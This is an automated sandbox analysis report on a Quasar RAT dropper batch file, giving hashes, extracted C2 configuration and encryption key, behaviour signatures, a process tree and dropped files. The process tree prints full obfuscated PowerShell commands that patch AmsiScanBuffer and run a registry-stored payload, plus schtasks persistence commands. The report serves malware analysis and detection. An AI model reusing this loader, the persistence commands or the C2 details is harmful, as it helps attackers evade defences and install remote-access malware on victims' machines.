Analysis
-
max time kernel
1800s -
max time network
1791s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
08-05-2024 17:16
General
-
Target
Uni.bat
-
Size
670KB
-
MD5
6a80458e28d1386f08bbd333e223ec19
-
SHA1
77ab8b6fa59cc618bf4a5e7f52ffcd8f5c9656a8
-
SHA256
8711245a4e790f4e757f4657e0edd3ff36cd767293e60b56d8e8501bca9c8a3d
-
SHA512
e6db2882538d6b563aaeb8df1831ea8c90dd37242fe686e9ab0b80f9c397bdfdf3596b28b036ac9308c456257e7a3cc607657c4e98853647e85d23f8b1588d81
-
SSDEEP
12288:3X+4dH3qy2pEKjy2YkbOtscQeH8XDYTDL832UtYnUg3:H+4dH3enjy2ZbOzTceUq
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-dOMA5C0pQTTpKjVsCp
Attributes
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 15 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9dfd7cb8-67a0-45e3-9f1d-df43161f88de}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4f90bf2c-a43b-4b20-b03e-407d6e2358aa}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wTFGeKLwCGwp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gHqrRMcySsftKx,[Parameter(Position=1)][Type]$VawovCrSBq)$XTtmyckxsML=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+[Char](99)+''+'t'+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+'mo'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+',A'+[Char](117)+''+'t'+'o'+'C'+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$XTtmyckxsML.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+'m'+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$gHqrRMcySsftKx).SetImplementationFlags(''+[Char](82)+'u'+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$XTtmyckxsML.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eB'+[Char](121)+'S'+'i'+'g,'+'N'+''+[Char](101)+'wS'+'l'+''+'o'+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l',$VawovCrSBq,$gHqrRMcySsftKx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'ti'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $XTtmyckxsML.CreateType();}$nQiVzsIuKNPrp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+'t'+'.'+''+'W'+''+'i'+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+'N'+''+[Char](97)+''+'t'+'iv'+'e'+''+[Char](77)+''+[Char](101)+''+'t'+''+'h'+'od'+'s'+'');$EsHoDxImuHnGnL=$nQiVzsIuKNPrp.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+'ub'+[Char](108)+'ic,'+[Char](83)+''+[Char](116)+'ati'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CFvKdRzLIMZdfooNbwq=wTFGeKLwCGwp @([String])([IntPtr]);$FacMhWIjqyfkJYqAvzARLe=wTFGeKLwCGwp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KadAdlmSAfL=$nQiVzsIuKNPrp.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$lgIYZORAXJjjpY=$EsHoDxImuHnGnL.Invoke($Null,@([Object]$KadAdlmSAfL,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+'a'+''+[Char](114)+''+[Char](121)+'A')));$VdWAkijbihiuIKXBK=$EsHoDxImuHnGnL.Invoke($Null,@([Object]$KadAdlmSAfL,[Object]('V'+'i'+''+[Char](114)+''+'t'+'ua'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+'ect')));$ECXOWTV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lgIYZORAXJjjpY,$CFvKdRzLIMZdfooNbwq).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$MXGIHAllYocOpSLID=$EsHoDxImuHnGnL.Invoke($Null,@([Object]$ECXOWTV,[Object](''+'A'+''+[Char](109)+'s'+'i'+'S'+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'fer')));$tVXxvtCTrx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VdWAkijbihiuIKXBK,$FacMhWIjqyfkJYqAvzARLe).Invoke($MXGIHAllYocOpSLID,[uint32]8,4,[ref]$tVXxvtCTrx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MXGIHAllYocOpSLID,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VdWAkijbihiuIKXBK,$FacMhWIjqyfkJYqAvzARLe).Invoke($MXGIHAllYocOpSLID,[uint32]8,0x20,[ref]$tVXxvtCTrx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OnSsTcGlTXoK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XUcvPfnTCWvqOu,[Parameter(Position=1)][Type]$vHwIcKoZfy)$ndcYvqnbyaY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+'e'+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+'m'+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'bli'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+','+[Char](65)+'ns'+[Char](105)+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'utoC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$ndcYvqnbyaY.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+'c'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$XUcvPfnTCWvqOu).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$ndcYvqnbyaY.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','Pub'+'l'+'i'+'c'+','+'H'+''+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+'V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$vHwIcKoZfy,$XUcvPfnTCWvqOu).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+'im'+[Char](101)+''+','+'Man'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $ndcYvqnbyaY.CreateType();}$KAVeurjRsvTdx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+'sof'+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'ds');$fFRohqcbBryjgq=$KAVeurjRsvTdx.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'ProcA'+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'bl'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$puWELlAXwDIDaTBpruj=OnSsTcGlTXoK @([String])([IntPtr]);$uYjbIGVdjUlUsKtxIXuFRG=OnSsTcGlTXoK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JtSvBjpuBPO=$KAVeurjRsvTdx.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+[Char](101)+'l'+[Char](51)+'2'+'.'+'d'+[Char](108)+'l')));$AYPmqDIAOtDNMA=$fFRohqcbBryjgq.Invoke($Null,@([Object]$JtSvBjpuBPO,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$MdKSkucCENEKmqApC=$fFRohqcbBryjgq.Invoke($Null,@([Object]$JtSvBjpuBPO,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+'ua'+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$SEAEWxD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYPmqDIAOtDNMA,$puWELlAXwDIDaTBpruj).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$hYEQHedRelFhyavbr=$fFRohqcbBryjgq.Invoke($Null,@([Object]$SEAEWxD,[Object]('A'+[Char](109)+'s'+[Char](105)+''+'S'+'c'+'a'+''+[Char](110)+'B'+'u'+'f'+[Char](102)+'e'+'r'+'')));$boAometOlq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MdKSkucCENEKmqApC,$uYjbIGVdjUlUsKtxIXuFRG).Invoke($hYEQHedRelFhyavbr,[uint32]8,4,[ref]$boAometOlq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hYEQHedRelFhyavbr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MdKSkucCENEKmqApC,$uYjbIGVdjUlUsKtxIXuFRG).Invoke($hYEQHedRelFhyavbr,[uint32]8,0x20,[ref]$boAometOlq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue('$7'+[Char](55)+'s'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\findstr.exefindstr /e "'v" "C:\Users\Admin\AppData\Local\Temp\Uni.bat"3⤵
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\x.vbs3⤵
-
C:\Users\Admin\AppData\Local\Temp\x.exeC:\Users\Admin\AppData\Local\Temp\x.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\x.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77x.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\x.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Local\Temp\xFilesize
4KB
MD5e4870e835feab58e50c0a2a05fdb733b
SHA1d81f625b7dabc09e9fccd515dcd89c6c1da46ee6
SHA2560ca17ef0a09d95e6751b571a80cc965de79bda8e94c35bdee537c897951125b1
SHA512488234c5c66c3c18376ceff9493c2f12302dafce8b02cd7124bce7682031dad95712a8e652efe75629c101e3efa7347245892a8e89c735816c637ff7ecfb4cd5
-
C:\Users\Admin\AppData\Local\Temp\xFilesize
560KB
MD57a0b5e602d8f8674134628255c8955b3
SHA1eb1171c299ac9dd2199d12d7084a9a68a8ab33ad
SHA2562629b725c93d70dde683bd0bf89e749d4e7c469096a3f0d89fcf09ea871c0021
SHA512b059685576ed14753eee0264a56f8d852036db659ec0aeb91527331ef967f349a8cd57c6f16302acdf6a900718e2588651aed051ed67e4a4f73bf4c0b00f4f41
-
C:\Users\Admin\AppData\Local\Temp\x.exeFilesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
C:\Users\Admin\AppData\Local\Temp\x.vbsFilesize
380B
MD5ec9a2fb69a379d913a4e0a953cd3b97c
SHA1a0303ed9f787c042071a1286bba43a5bbdd0679e
SHA256cf8268d158bb819ef158ff6ccbed64d5e379148a0adb1f73a082a01d56d0286b
SHA512fef8e24a680991046bd7dacd6079c7e48c3031fe46caae722ea93797ee16c052073ba97959e992ea71ac7ab72fbcedaa5cf4a410657aac4c10ad24de6935e9d6
-
C:\Windows\Temp\__PSScriptPolicyTest_nip5ihpe.xfk.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD565a63568e313872de0aded761edc8242
SHA18f9a0d8c74637e58b1c5c1c3328ca474dfb9667d
SHA256c25d3cb42bd8facaf6212a152603a9cbd5fc9b47ae1fedd472a39a007093c0c7
SHA51214c44f20f457d707dc701857dd1a5f0d7fc5435f86d91645c7b11e6827fab46eb5aa09ced3efb1e4810bde99c23cad4c612cc6f47767120118aa0784b67283db
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
3KB
MD5676d33d16eff06cd9468943bf1909c9a
SHA105a9d5c521f52406d118a15d0c26b0c426327529
SHA2567fe6f06531f00183f775c390f0f3e90047c291667c316314d949fe568cc9f55d
SHA5129e8915cf93a8f26ff916305b6abf9b4282e6006e6c8aee4232d234554e6badc4a3d2af101c4e0ce6191564f186f3792dbd60a8066095d1f71d1fbab9aaac0435
-
